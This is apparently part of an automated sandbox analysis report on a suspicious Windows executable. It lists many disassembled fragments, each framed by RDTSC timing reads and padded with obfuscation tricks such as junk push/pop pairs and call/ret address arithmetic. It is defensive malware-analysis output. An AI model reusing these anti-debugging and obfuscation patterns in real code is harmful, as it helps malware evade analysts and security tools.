Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A54C9 second address: 8A550E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, 291A8F00h 0x00000010 push 00000000h 0x00000012 mov ebx, ecx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FBF8C4F2088h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 xor edi, dword ptr [ebp+122D1D22h] 0x00000036 push eax 0x00000037 jnp 00007FBF8C4F2090h 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A84C9 second address: 8A855C instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF8C4F2A50h 0x00000008 jmp 00007FBF8C4F2A4Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FBF8C4F2A48h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c sub ebx, dword ptr [ebp+122D1A41h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007FBF8C4F2A48h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e jmp 00007FBF8C4F2A57h 0x00000053 xchg eax, esi 0x00000054 jmp 00007FBF8C4F2A52h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jnl 00007FBF8C4F2A46h 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A969B second address: 8A96A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A96A1 second address: 8A96B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AA60A second address: 8AA60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AB64D second address: 8AB653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AC5C6 second address: 8AC5DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AC5DF second address: 8AC5E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FBF8C4F2A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AD6FA second address: 8AD710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jl 00007FBF8C4F2086h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AD710 second address: 8AD714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8B2A6A second address: 8B2A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jmp 00007FBF8C4F208Fh 0x0000000b pop esi 0x0000000c popad 0x0000000d push ebx 0x0000000e jg 00007FBF8C4F208Ah 0x00000014 jl 00007FBF8C4F2092h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8B2A94 second address: 8B2A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8B72A0 second address: 8B72A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8B6E5B second address: 8B6E61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8BC7F5 second address: 8BC7FF instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8BCA79 second address: 8BCA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8C2FD3 second address: 8C2FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8C22C2 second address: 8C22E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF8C4F2A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF8C4F2A56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8C22E8 second address: 8C22EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8C2566 second address: 8C256B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8C256B second address: 8C257E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8C257E second address: 8C2582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8C2582 second address: 8C259C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jnl 00007FBF8C4F2086h 0x00000010 jo 00007FBF8C4F2086h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8C2CEC second address: 8C2CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84FB43 second address: 84FB62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF8C4F208Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84FB62 second address: 84FB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 890F09 second address: 890F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 890F0D second address: 890F31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jng 00007FBF8C4F2A50h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891195 second address: 89119B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89154A second address: 891550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8915FF second address: 891605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891605 second address: 89163C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FBF8C4F2A57h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push edi 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89163C second address: 89168C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FBF8C4F2099h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007FBF8C4F2092h 0x00000016 pop eax 0x00000017 sub dword ptr [ebp+122D1B3Bh], edx 0x0000001d call 00007FBF8C4F2089h 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jns 00007FBF8C4F2086h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89168C second address: 89169E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jc 00007FBF8C4F2A54h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89169E second address: 8916A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8916A2 second address: 8916C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007FBF8C4F2A54h 0x00000010 jmp 00007FBF8C4F2A4Eh 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8916C7 second address: 8916CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891B26 second address: 891B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891F84 second address: 891F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891F88 second address: 892004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FBF8C4F2A48h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D3AB4h] 0x0000002e push 0000001Eh 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FBF8C4F2A48h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a pushad 0x0000004b add dword ptr [ebp+122D24B1h], esi 0x00000051 popad 0x00000052 js 00007FBF8C4F2A4Ch 0x00000058 add edi, 76D1022Ah 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jc 00007FBF8C4F2A4Ch 0x00000067 jns 00007FBF8C4F2A46h 0x0000006d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 892004 second address: 89200A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A0457 second address: 8A0473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBF8C4F2A4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A0473 second address: 8A0503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FBF8C4F2088h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 pushad 0x00000023 mov esi, dword ptr [ebp+122D234Ch] 0x00000029 xor ecx, dword ptr [ebp+122D36AFh] 0x0000002f popad 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jmp 00007FBF8C4F2093h 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 call 00007FBF8C4F2093h 0x00000048 or edi, 29B56E50h 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [ebp+122D0135h] 0x00000055 mov dword ptr [ebp+122D3798h], edi 0x0000005b push FFFFFFFFh 0x0000005d mov edi, dword ptr [ebp+122D2B27h] 0x00000063 push eax 0x00000064 pushad 0x00000065 ja 00007FBF8C4F2088h 0x0000006b push eax 0x0000006c push edx 0x0000006d push edx 0x0000006e pop edx 0x0000006f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89E3D5 second address: 89E3DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89E3DB second address: 89E407 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF8C4F2099h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FBF8C4F208Ch 0x00000013 jbe 00007FBF8C4F2086h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A16F2 second address: 8A16FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A16FB second address: 8A1701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A36C3 second address: 8A36C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A4660 second address: 8A4665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A4665 second address: 8A469B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FBF8C4F2A57h 0x00000014 jne 00007FBF8C4F2A46h 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A563D second address: 8A5641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A5641 second address: 8A56EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF8C4F2A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBF8C4F2A51h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FBF8C4F2A55h 0x00000016 nop 0x00000017 mov ebx, eax 0x00000019 mov di, B760h 0x0000001d push dword ptr fs:[00000000h] 0x00000024 mov ebx, 3FA3155Dh 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FBF8C4F2A48h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov bx, di 0x0000004d mov dword ptr [ebp+12460189h], edi 0x00000053 mov eax, dword ptr [ebp+122D0CCDh] 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push edi 0x0000005e call 00007FBF8C4F2A48h 0x00000063 pop edi 0x00000064 mov dword ptr [esp+04h], edi 0x00000068 add dword ptr [esp+04h], 0000001Ah 0x00000070 inc edi 0x00000071 push edi 0x00000072 ret 0x00000073 pop edi 0x00000074 ret 0x00000075 mov dword ptr [ebp+122D32E5h], ebx 0x0000007b nop 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A56EA second address: 8A56EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A76E0 second address: 8A76E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A76E4 second address: 8A76EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A877A second address: 8A877E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A98DC second address: 8A98E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A76EA second address: 8A76F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBF8C4F2A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A877E second address: 8A8784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A8784 second address: 8A878A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A76F4 second address: 8A779C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+122D1D90h], edi 0x00000014 call 00007FBF8C4F2092h 0x00000019 mov edi, dword ptr [ebp+122D32BDh] 0x0000001f pop ebx 0x00000020 push dword ptr fs:[00000000h] 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007FBF8C4F2088h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov edi, esi 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007FBF8C4F2088h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 0000001Bh 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 mov eax, dword ptr [ebp+122D01F1h] 0x0000006a mov edi, edx 0x0000006c push FFFFFFFFh 0x0000006e add edi, 27A23F2Eh 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a pop eax 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A779C second address: 8A77A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AB81F second address: 8AB824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AB8BE second address: 8AB8C8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF8C4F2A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AC855 second address: 8AC85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FBF8C4F2086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AC85F second address: 8AC872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FBF8C4F2A48h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AC872 second address: 8AC88B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2094h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A36C7 second address: 8A36D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A36D2 second address: 8A3755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FBF8C4F2088h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jnp 00007FBF8C4F2089h 0x00000029 mov di, ax 0x0000002c mov dword ptr [ebp+122D5711h], edi 0x00000032 push dword ptr fs:[00000000h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov eax, dword ptr [ebp+122D0279h] 0x00000046 push 00000000h 0x00000048 push ebx 0x00000049 call 00007FBF8C4F2088h 0x0000004e pop ebx 0x0000004f mov dword ptr [esp+04h], ebx 0x00000053 add dword ptr [esp+04h], 0000001Ah 0x0000005b inc ebx 0x0000005c push ebx 0x0000005d ret 0x0000005e pop ebx 0x0000005f ret 0x00000060 mov edi, esi 0x00000062 push FFFFFFFFh 0x00000064 movzx ebx, bx 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FBF8C4F208Ah 0x0000006f rdtsc
